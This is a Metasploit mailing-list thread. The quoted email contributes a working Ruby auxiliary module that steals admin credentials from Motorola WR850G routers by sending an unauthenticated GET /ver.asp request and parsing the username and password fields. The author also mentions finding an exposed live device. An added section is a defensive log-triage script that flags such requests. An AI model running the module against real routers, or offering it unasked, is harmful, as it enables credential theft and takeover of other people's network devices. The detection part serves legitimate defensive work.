Applied. Thanks!

Best regards,
Ramon

On Sun, 2008-10-05 at 00:56 -0500, Kris Katterjohn wrote:
> Hey guys,
>
> I've attached a new auxiliary module for obtaining the login credentials to a
> Motorola WR850G router with firmware v4.03. I just put it under admin, but
> there is probably a better place for it.
>
>
> msf auxiliary(wr850g_cred) > run
> [*] Found username "xxxx" and password "yyyy"
> [*] Auxiliary module execution completed
>
>
> msf > info admin/wr850g_cred
>
>        Name: Motorola WR850G v4.03 Credentials
>     Version: 1
>
> Provided by:
>   Kris Katterjohn <[EMAIL PROTECTED]>
>
> Basic options:
>   Name   Current Setting  Required  Description
>   ----   ---------------  --------  -----------
>   RHOST                   yes       The target address
>   RPORT  80               yes       The target port
>
> Description:
>   Login credentials to the Motorola WR850G router with firmware v4.03
>   can be obtained via a simple GET request if issued while the
>   administrator is logged in. A lot more information is available
>   through this request, but you can get it all and more after logging
>   in.
>
>
> This was disclosed back in Sep 2004, but I still easily found one lying around
> with this firmware.
>
> Thanks,
> Kris Katterjohn
>
> plain text document attachment (wr850g_cred.rb)
> require 'msf/core'
>
> class Metasploit3 < Msf::Auxiliary
>
>   include Msf::Exploit::Remote::Tcp
>
>   def initialize(info = {})
>     super(update_info(info,
>       'Name'           => 'Motorola WR850G v4.03 Credentials',
>       'Description'    => %q{
>         Login credentials to the Motorola WR850G router with
>         firmware v4.03 can be obtained via a simple GET request
>         if issued while the administrator is logged in.  A lot
>         more information is available through this request, but
>         you can get it all and more after logging in.
>       },
>       'Author'         => 'Kris Katterjohn <[EMAIL PROTECTED]>',
>       'License'        => MSF_LICENSE,
>       'Version'        => '1',
>       'References'     =>
>         [ [ 'URL', 'http://seclists.org/bugtraq/2004/Sep/0339.html'] ],
>       'DisclosureDate' => 'Sep 24 2004'))
>
>     register_options([Opt::RPORT(80)])
>   end
>
>   def run
>     connect
>
>     # Plain HTTP/1.0 request for the page, sent without any credentials
>     sock.put("GET /ver.asp HTTP/1.0\r\n\r\n")
>     response = sock.get
>
>     disconnect
>
>     if response.nil? or response.empty?
>       print_status("No response from server")
>       return
>     end
>
>     # 302 Redirect: a status line other than 200 means no admin session
>     if response.split(/\r\n/)[0] !~ /200 Ok/
>       print_status("Administrator not logged in")
>       return
>     end
>
>     # Each setting comes back as name=value terminated by <br>
>     user = $1 if response.match("http_username=([^\n]*)<br>")
>     pass = $1 if response.match("http_passwd=([^\n]*)<br>")
>
>     print_status("Found username \"#{user}\" and password \"#{pass}\"") if user and pass
>   end
> end
>
> _______________________________________________
> Framework-Hackers mailing list
> Framework-Hackers@spool.metasploit.com
> http://spool.metasploit.com/mailman/listinfo/framework-hackers
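
For owners of an affected router, the 200-versus-302 behaviour the module relies on can also be used for detection. The following is an added example, not part of the original thread or of Metasploit: it triages HTTP records from a network sensor placed in front of the router. The record layout, the sample records and the ADMIN_HOSTS list are all assumptions made for illustration.

```ruby
require 'set'

# Assumed: the only workstation(s) expected to browse the router's admin pages.
ADMIN_HOSTS = Set['192.168.10.5'].freeze

# Constructed sample records: "<time> <client> <method> <uri> <status>"
SAMPLE_LOG = <<~LOG
  2008-10-05T00:41:02Z 192.168.10.5 GET /ver.asp 200
  2008-10-05T00:41:09Z 192.168.10.77 GET /ver.asp 302
  2008-10-05T00:43:30Z 192.168.10.77 GET /ver.asp?x=1 200
  2008-10-05T00:44:00Z 192.168.10.77 GET /index.asp 200
  garbage line
LOG

Finding = Struct.new(:time, :client, :severity, :reason)

# Returns one Finding per /ver.asp request that came from a non-admin host.
def triage(log, admin_hosts = ADMIN_HOSTS)
  findings = log.each_line.map do |line|
    time, client, method, uri, status = line.split
    next unless status && method == 'GET'        # skip malformed records
    next unless uri.split('?', 2).first == '/ver.asp'
    next if admin_hosts.include?(client)

    case status
    when '200'
      # The page was served, so an admin session was active: treat the
      # router credentials as disclosed to this client.
      Finding.new(time, client, :critical,
                  'ver.asp served to non-admin host; rotate router credentials')
    when '302'
      # Redirected: nobody was logged in, nothing leaked, but it is a probe.
      Finding.new(time, client, :warning,
                  'ver.asp probed while no administrator was logged in')
    else
      Finding.new(time, client, :info, "ver.asp requested, status #{status}")
    end
  end
  findings.compact
end

if __FILE__ == $PROGRAM_NAME
  triage(SAMPLE_LOG).each do |f|
    puts format('%-8s %s %s: %s', f.severity, f.time, f.client, f.reason)
  end
end
```

A critical finding means the credentials should be changed and the firmware replaced; a warning only shows that someone on the network is polling the page.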